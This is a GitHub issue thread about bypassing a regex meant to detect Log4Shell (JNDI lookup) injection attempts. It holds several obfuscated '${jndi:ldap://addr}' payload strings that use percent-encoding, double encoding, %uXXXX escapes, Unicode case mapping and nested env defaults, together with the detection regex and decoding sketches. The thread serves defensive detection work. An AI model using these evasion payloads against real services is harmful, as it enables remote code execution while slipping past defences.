Regex can be bypassed. #3

Closed
karanlyons opened this issue Dec 18, 2021 · 2 comments

@karanlyons

karanlyons commented Dec 18, 2021

Compare against https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

>>> import re
>>> from pprint import pprint

>>> BACK2ROOT_RE = re.compile(r'(?:\$|%(?:25)*24|\\(?:0024|0{0,2}44))(?:{|%(?:25)*7[Bb]|\\(?:007[Bb]|0{0,2}173)).{0,30}?((?:[Jj]|%(?:25)*[46][Aa]|\\(?:00[46][Aa]|0{0,2}1[15]2)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?((?:[Ll]|%(?:25)*[46][Cc]|\\(?:00[46][Cc]|0{0,2}1[15]4)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?|(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Mm]|%(?:25)*[46][Dd]|\\(?:00[46][Dd]|0{0,2}1[15]5)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)|(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:.{0,30}?(?:[Ii]|%(?:25)*[46]9|\\(?:00[46]9|0{0,2}1[15]1)|ı)){2}.{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Pp]|%(?:25)*[57]0|\\(?:00[57]0|0{0,2}1[26]0))|(?:[Cc]|%(?:25)*[46]3|\\(?:00[46]3|0{0,2}1[04]3)).{0,30}?(?:[Oo]|%(?:25)*[46][Ff]|\\(?:00[46][Ff]|0{0,2}1[15]7)).{0,30}?(?:[Rr]|%(?:25)*[57]2|\\(?:00[57]2|0{0,2}1[26]2)).{0,30}?(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1))|(?:[Nn]|%(?:25)*[46][Ee]|\\(?:00[46][Ee]|0{0,2}1[15]6)).{0,30}?(?:[Dd]|%(?:25)*[46]4|\\(?:00[46]4|0{0,2}1[04]4)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3))|(?:[Hh]|%(?:25)*[46]8|\\(?:00[46]8|0{0,2}1[15]0))(?:.{0,30}?(?:[Tt]|%(?:25)*[57]4|\\(?:00[57]4|0{0,2}1[26]4))){2}.{0,30}?(?:[Pp]|%(?:25)*[57]0
|\\(?:00[57]0|0{0,2}1[26]0))(?:.{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)))?).{0,30}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72)).{0,30}?(?:\/|%(?:25)*2[Ff]|\\(?:002[Ff]|0{0,2}57)|\${)|(?:[Bb]|%(?:25)*[46]2|\\(?:00[46]2|0{0,2}1[04]2)).{0,30}?(?:[Aa]|%(?:25)*[46]1|\\(?:00[46]1|0{0,2}1[04]1)).{0,30}?(?:[Ss]|%(?:25)*[57]3|\\(?:00[57]3|0{0,2}1[26]3)).{0,30}?(?:[Ee]|%(?:25)*[46]5|\\(?:00[46]5|0{0,2}1[04]5)).{2,60}?(?::|%(?:25)*3[Aa]|\\(?:003[Aa]|0{0,2}72))(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z]))')

>>> esc_p = lambda s: "".join("%%%s" % hex(ord(c))[2:] if ord(c) < 256 else c for c in s)

>>> s1 = esc_p('${jnd${upper:ı}:ldap://')
>>> s1
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3aı%7d%3a%6c%64%61%70%3a%2f%2f'

>>> s2 = esc_p(esc_p('${jndi:ldap://addr}'))
>>> s2
'%25%32%34%25%37%62%25%36%61%25%36%65%25%36%34%25%36%39%25%33%61%25%36%63%25%36%34%25%36%31%25%37%30%25%33%61%25%32%66%25%32%66%25%36%31%25%36%34%25%36%34%25%37%32%25%37%64'

>>> BACK2ROOT_RE.search(s1) or False
<re.Match object; span=(0, 64), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3aı%7d%3a%6c>

>>> BACK2ROOT_RE.search(s2) or False
False

>>> from log4shell_regexes import *

>>> pprint(test(s1))
{'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 67), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3aı%7d%3a%6c>,
 'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 43), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3aı%7d'>,
 'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 67), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3aı%7d%3a%6c>}

>>> pprint(test_thorough(s2))
{'${jndi:ldap://addr}': {'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'ANY_OPT_RCURLY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'ANY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'SIMPLE_OPT_RCURLY_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>,
                         'SIMPLE_RE': <re.Match object; span=(0, 19), match='${jndi:ldap://addr}'>},
 '%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%61%64%64%72%7d': {'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 57), match='%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%61%64%>,
                                                               'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 57), match='%24%7b%6a%6e%64%69%3a%6c%64%61%70%3a%2f%2f%61%64%>}}

The (?:%(25)*24|%) idea is neat, and I even incorporated it briefly (along with (?:%(25)*5c|\\)), but it assumes you’ll only ever escape url unsafe characters, and a smart attacker is of course going to violate that assumption. It is better not to lull your defender into a false sense of security, and this is why I have test_thorough.

This regex also does not detect Unicode case-mapping attacks. The gist I’ve shared with you before does, by avoiding entirely the assumptions that make the evasion possible.
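
The double-encoding bypass above (s2) can also be caught by decoding before matching rather than by encoding every escape form into the pattern. The following is a minimal sketch of that idea only. Judging from its output, test_thorough appears to test each decoding layer, but the gist's actual implementation may differ. `SIMPLE_JNDI_RE`, `decode_layers`, and `search_all_layers` are hypothetical names introduced here, and the pattern is deliberately naive.

```python
import re
from urllib.parse import unquote

# Deliberately simple stand-in pattern (an assumption for this sketch);
# it is not one of the regexes discussed in this thread.
SIMPLE_JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def decode_layers(s, max_depth=8):
    """Return s followed by each successive percent-decoding of it.

    Stops when decoding no longer changes the string or after max_depth
    rounds, whichever comes first.
    """
    layers = [s]
    for _ in range(max_depth):
        decoded = unquote(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers


def search_all_layers(s):
    """Map each decoding layer that matches the pattern to its match object."""
    hits = {}
    for layer in decode_layers(s):
        match = SIMPLE_JNDI_RE.search(layer)
        if match is not None:
            hits[layer] = match
    return hits


# Percent-encode every character of an ASCII string, twice.
esc = lambda s: "".join("%%%02x" % ord(c) for c in s)
double_encoded = esc(esc("${jndi:ldap://addr}"))

print(SIMPLE_JNDI_RE.search(double_encoded))    # the raw string does not match
print(list(search_all_layers(double_encoded)))  # the fully decoded layer does
```

The trade-off is that the detector has to know which decodings the target stack applies. Percent-decoding is only one of them.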

@back2root
Owner

Hi

Thanks for the issue. I used it, among other things, to incorporate a few optimizations into my RegEx. Here are some comments on your suggestions:

s1 = esc_p('${jnd${upper:ı}:ldap://')
s1
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%131%7d%3a%6c%64%61%70%3a%2f%2f'

The esc_p function does not work properly. In particular, the "ı" is encoded incorrectly by your function.
The old RegEx wasn't capable of handling "ı" in URL-encoded form; the upcoming version will be.
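
For reference, a standards-conforming percent-encoding of "ı" (U+0131) goes through its UTF-8 bytes. The sketch below shows one way to encode every byte, safe characters included. `esc_utf8` is a hypothetical name used only for illustration and is not part of either project.

```python
from urllib.parse import unquote


def esc_utf8(s):
    """Percent-encode every byte of the UTF-8 encoding of s.

    Unlike a per-code-point hex dump, this always emits two hex digits
    per byte, so non-ASCII characters become multi-byte escape sequences.
    """
    return "".join("%%%02x" % byte for byte in s.encode("utf-8"))


payload = "${jnd${upper:ı}:ldap://"
encoded = esc_utf8(payload)

print(esc_utf8("ı"))                # %c4%b1
print(unquote(encoded) == payload)  # True: the encoding round-trips
```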

it assumes you’ll only ever escape url unsafe characters

The old RegEx already allowed for escaping of safe characters in general, though it didn't handle double encoding of safe characters correctly. The upcoming version will.

It is better not to lull your defender into a false sense of security

It's not my intent to "lull" anyone into anything.
The goal is a RegEx that represents a reasonable compromise between detecting as many attack attempts as possible and keeping the number of false positives acceptable.
An APT attacker will find a way around it if necessary, but less elaborate attacks will still trip the warning light.

I'll put a comment into the README so everyone can understand.

@karanlyons
Author

karanlyons commented Dec 20, 2021

The esc_p function does not work properly.

You’re right; in my haste I missed a conditional, which I’ve fixed in the original message. It now shows both your regex and my collection as catching the first. One thing to be mindful of here, though, is that you’re headed down the path of handling all sorts of encodings within the one regex. For example, there was, for at least a brief while, a non-standard but not uncommon percent escaping for Unicode: %uXXXX. If I recall correctly, this was largely due to JavaScript’s escape behavior (§15.1.2.4), which some web backends had opted to support for easier interoperability with JavaScript frontends:

>>> esc_pu = lambda s: "".join("%%%s" % hex(ord(c))[2:] if ord(c) < 256 else "%%u%s" % hex(ord(c))[2:].rjust(4, "0") for c in s)
>>> s3 = esc_pu('${jnd${upper:ı}:ldap://')
>>> s3
'%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%3a%6c%64%61%70%3a%2f%2f'

>>> BACK2ROOT_RE.search(s3) or False
False

>>> pprint(test(s3))
{'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 48), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d'>,
 'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>,
 'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 72), match='%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%>}

If the goal is to be resistant to unwrapping attacks against a diverse range of stacks, then you may well want to make sure alterations like this don’t also result in false negatives. I’m unsure of where you could expect to see this encoding nowadays, though. Interestingly, although neither my test nor my test_thorough function is explicitly aware of this encoding, they both detect the vector, as their methodology doesn’t rely on an assumption that this encoding would not exist.
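
To make the %uXXXX form concrete, here is a minimal sketch of a decoder that handles both %XX and %uXXXX in the spirit of JavaScript's legacy unescape. `unescape_js` and `PCT_U_RE` are hypothetical names introduced here. A backend that supports this encoding may differ in detail, for example in how it treats malformed sequences.

```python
import re

# Matches either the non-standard %uXXXX form or the ordinary %XX form.
PCT_U_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def unescape_js(s):
    """Decode %uXXXX and %XX escapes to the code points they name.

    Each %XX is treated as a single code point (Latin-1 style), not as a
    UTF-8 byte. Malformed sequences are left untouched.
    """
    def replace(match):
        hex_digits = match.group(1) or match.group(2)
        return chr(int(hex_digits, 16))

    return PCT_U_RE.sub(replace, s)


s3 = "%24%7b%6a%6e%64%24%7b%75%70%70%65%72%3a%u0131%7d%3a%6c%64%61%70%3a%2f%2f"
print(unescape_js(s3))  # ${jnd${upper:ı}:ldap://
```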

The old RegEx already allowed for escaping of safe characters in general, though it didn't handle double encoding of safe characters correctly. The upcoming version will.

Neat! It is frankly difficult to tell what the regex can and can’t catch due to its complexity.

It's not my intent to "lull" anyone into anything.

I do not think it is your intent, but I think it is a possible outcome. One of the hardest parts about being on a blue team is that, by definition, you get popped when you miss something, so it is crucial to understand exactly what you can and cannot catch. Grabbing a “comprehensive” regex like this, when it is unlikely to come with an understanding of its assumptions and limitations, can turn out to be dangerous. Encoding assumptions into your detections will always open up surreptitious paths for anyone who violates those assumptions.

As another example:

>>> s4 = '${env:ZILCH:-jnd${lower:${upper:ı}}://addr'

>>> BACK2ROOT_RE.search(s4) or False
False

>>> pprint(test(s4))
{'ANY_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'ANY_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
 'ANY_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'ANY_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
 'NESTED_INCL_ESCS_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'NESTED_INCL_ESCS_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>,
 'NESTED_OPT_RCURLY_RE': <re.Match object; span=(0, 42), match='${env:ZILCH:-jnd${lower:${upper:ı}}://addr'>,
 'NESTED_RE': <re.Match object; span=(0, 35), match='${env:ZILCH:-jnd${lower:${upper:ı}}'>}

I can’t easily tell you why your regex isn’t catching this one, due to its overall complexity (my best guess is that it doesn’t handle defaults and/or some forms of potential nested evaluation), and I’m actually surprised that it doesn’t, as I’d have assumed it would. This is the danger I’m speaking of: if I were running your detection and relying on it, I would likely assume that this would be caught and thus never notice that it wasn’t.
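
To illustrate why defaults and nested evaluation matter, the sketch below resolves a small subset of lookups from the inside out. It is a toy model written for this discussion, not Log4j's actual substitution logic. It assumes only `lower:`, `upper:`, and `prefix:key:-default` forms, and treats every keyed lookup as undefined so that the default is used. `lookup_bodies` and `evaluate` are hypothetical names.

```python
import re

# An innermost lookup: "${...}" whose body contains no "$", "{" or "}".
INNERMOST_RE = re.compile(r"\$\{([^${}]*)\}")


def evaluate(body):
    """Evaluate one lookup body under the toy assumptions stated above."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        # Assume the key is undefined, so the default value is substituted.
        return body.split(":-", 1)[1]
    return ""  # unknown lookup: drop it so the loop terminates


def lookup_bodies(s, max_rounds=32):
    """Return every lookup body encountered while resolving s inside-out."""
    seen = []
    for _ in range(max_rounds):
        match = INNERMOST_RE.search(s)
        if match is None:
            break
        seen.append(match.group(1))
        s = s[:match.start()] + evaluate(match.group(1)) + s[match.end():]
    return seen


# A hypothetical vector in the same style as s4, with the braces balanced.
vector = "${${env:ZILCH:-j}nd${lower:${upper:ı}}:ldap://addr}"
bodies = lookup_bodies(vector)
print(bodies)
print(any(body.lower().startswith("jndi:") for body in bodies))  # True
```

None of the characters j, n, d, i appear contiguously in the input; "jndi:" only exists after the default and the case mappings have been applied, which is why a pattern that spells out the literal letters can miss it.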
